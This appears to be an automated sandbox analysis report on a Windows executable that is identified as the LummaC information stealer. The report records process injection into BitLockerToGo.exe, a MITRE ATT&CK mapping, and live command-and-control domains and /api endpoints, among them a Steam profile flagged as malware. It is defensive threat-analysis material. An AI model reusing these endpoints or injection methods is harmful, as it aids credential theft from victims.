              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: 7wN7BF7WfX.exeStatic PE information: certificate valid
              Source: 7wN7BF7WfX.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: 7wN7BF7WfX.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: 7wN7BF7WfX.exeStatic file information: File size 14180600 > 1048576
              Source: 7wN7BF7WfX.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x460a00
              Source: 7wN7BF7WfX.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x89ce00
              Source: 7wN7BF7WfX.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 7wN7BF7WfX.exe, 00000000.00000003.1709351969.00000182F7E00000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000003.1709321267.00000182F7E40000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000002.1736916326.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0006A2000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 7wN7BF7WfX.exe, 00000000.00000003.1709351969.00000182F7E00000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000003.1709321267.00000182F7E40000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000002.1736916326.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0006A2000.00000004.00001000.00020000.00000000.sdmp
              Source: 7wN7BF7WfX.exeStatic PE information: section name: .xdata
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7864Thread sleep time: -30000s >= -30000sJump to behavior
              Source: BitLockerToGo.exe, 00000004.00000002.2039890403.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1737047471.00000182B27E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_02B47590 LdrInitializeThunk,4_2_02B47590

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2B00000 protect: page execute and read and writeJump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2B00000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: covvercilverow.shop
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: surroundeocw.shop
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abortinoiwiam.shop
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: pumpkinkwquo.shop
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: priooozekw.shop
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deallyharvenw.shop
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: defenddsouneuw.shop
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: racedsuitreow.shop
              Source: 7wN7BF7WfX.exe, 00000000.00000002.1736585848.000000C0005B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: dividenntykw.shop
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2B00000Jump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2923008Jump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeQueries volume information: C:\Users\user\Desktop\7wN7BF7WfX.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\7wN7BF7WfX.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Go Injector
              Source: Yara matchFile source: 7wN7BF7WfX.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.7wN7BF7WfX.exe.7ff7a1880000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.7wN7BF7WfX.exe.7ff7a1880000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1738001301.00007FF7A234A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1305930689.00007FF7A234A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 7wN7BF7WfX.exe PID: 7428, type: MEMORYSTR
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Go Injector
              Source: Yara matchFile source: 7wN7BF7WfX.exe, type: SAMPLE
              Source: Yara matchFile source: 0.0.7wN7BF7WfX.exe.7ff7a1880000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.7wN7BF7WfX.exe.7ff7a1880000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1738001301.00007FF7A234A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1305930689.00007FF7A234A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 7wN7BF7WfX.exe PID: 7428, type: MEMORYSTR
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol2
              Clipboard Data              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)311
              Process Injection              		Security Account Manager12
              System Information Discovery              		SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Deobfuscate/Decode Files or Information              		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              7wN7BF7WfX.exe37%ReversingLabsWin64.Dropper.Wingo

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://player.vimeo.com0%URL Reputationsafe
              https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f0%URL Reputationsafe
              https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
              https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
              http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
              http://www.certum.pl/CPS00%URL Reputationsafe
              https://steam.tv/0%URL Reputationsafe
              https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
              http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
              https://store.steampowered.com/points/shop/0%URL Reputationsafe
              https://lv.queniujq.cn0%URL Reputationsafe
              https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
              https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
              https://checkout.steampowered.com/0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
              https://store.steampowered.com/;0%URL Reputationsafe
              https://store.steampowered.com/about/0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
              https://help.steampowered.com/en/0%URL Reputationsafe
              https://store.steampowered.com/news/0%URL Reputationsafe
              https://community.akamai.steamstatic.com/0%URL Reputationsafe
              http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
              https://recaptcha.net/recaptcha/;0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
              https://store.steampowered.com/stats/0%URL Reputationsafe
              https://medal.tv0%URL Reputationsafe
              https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
              https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
              https://store.steampowered.com/steam_refunds/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              dividenntykw.shop
              		104.21.8.235
              		truetrue
                		unknown
                steamcommunity.com
                		104.102.49.254
                		truefalse
                  		unknown
                  gravvitywio.store
                  		172.67.209.193
                  		truetrue
                    		unknown
                    priooozekw.shop
                    		unknown
                    		unknowntrue
                      		unknown
                      pumpkinkwquo.shop
                      		unknown
                      		unknowntrue
                        		unknown
                        abortinoiwiam.shop
                        		unknown
                        		unknowntrue
                          		unknown
                          deallyharvenw.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            surroundeocw.shop
                            		unknown
                            		unknowntrue
                              		unknown
                              racedsuitreow.shop
                              		unknown
                              		unknowntrue
                                		unknown
                                defenddsouneuw.shop
                                		unknown
                                		unknowntrue
                                  		unknown
                                  covvercilverow.shop
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    abortinoiwiam.shoptrue
                                      		unknown
                                      defenddsouneuw.shoptrue
                                        		unknown
                                        priooozekw.shoptrue
                                          		unknown
                                          surroundeocw.shoptrue
                                            		unknown
                                            https://dividenntykw.shop/apitrue
                                              		unknown
                                              https://steamcommunity.com/profiles/76561199724331900true
                                              • URL Reputation: malware
                                              		unknown
                                              racedsuitreow.shoptrue
                                                		unknown
                                                covvercilverow.shoptrue
                                                  		unknown
                                                  pumpkinkwquo.shoptrue
                                                    		unknown
                                                    deallyharvenw.shoptrue
                                                      		unknown
                                                      https://gravvitywio.store/apitrue
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://player.vimeo.comBitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5fBitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://github.com/golang/protobuf/issues/1609):7wN7BF7WfX.exefalse
                                                              		unknown
                                                              https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.gstatic.cn/recaptcha/BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://racedsuitreow.shop/N7BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&amp;l=eBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.youtube.comBitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://gravvitywio.store/BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.google.comBitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://racedsuitreow.shop/V7BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://s.ytimg.com;BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://www.certum.pl/CPS07wN7BF7WfX.exefalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://steam.tv/BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://cevcsca2021.ocsp-certum.com077wN7BF7WfX.exefalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://defenddsouneuw.shop/pi3BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://deallyharvenw.shop/apiBitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://dividenntykw.shop/YBitLockerToGo.exe, 00000004.00000002.2041483138.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765698684.0000000002C02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://steamcommunity.com/eBitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://racedsuitreow.shop/api_BitLockerToGo.exe, 00000004.00000003.1739688628.0000000002C47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w7wN7BF7WfX.exefalse
                                                                                            		unknown
                                                                                            https://sketchfab.comBitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://lv.queniujq.cnBitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
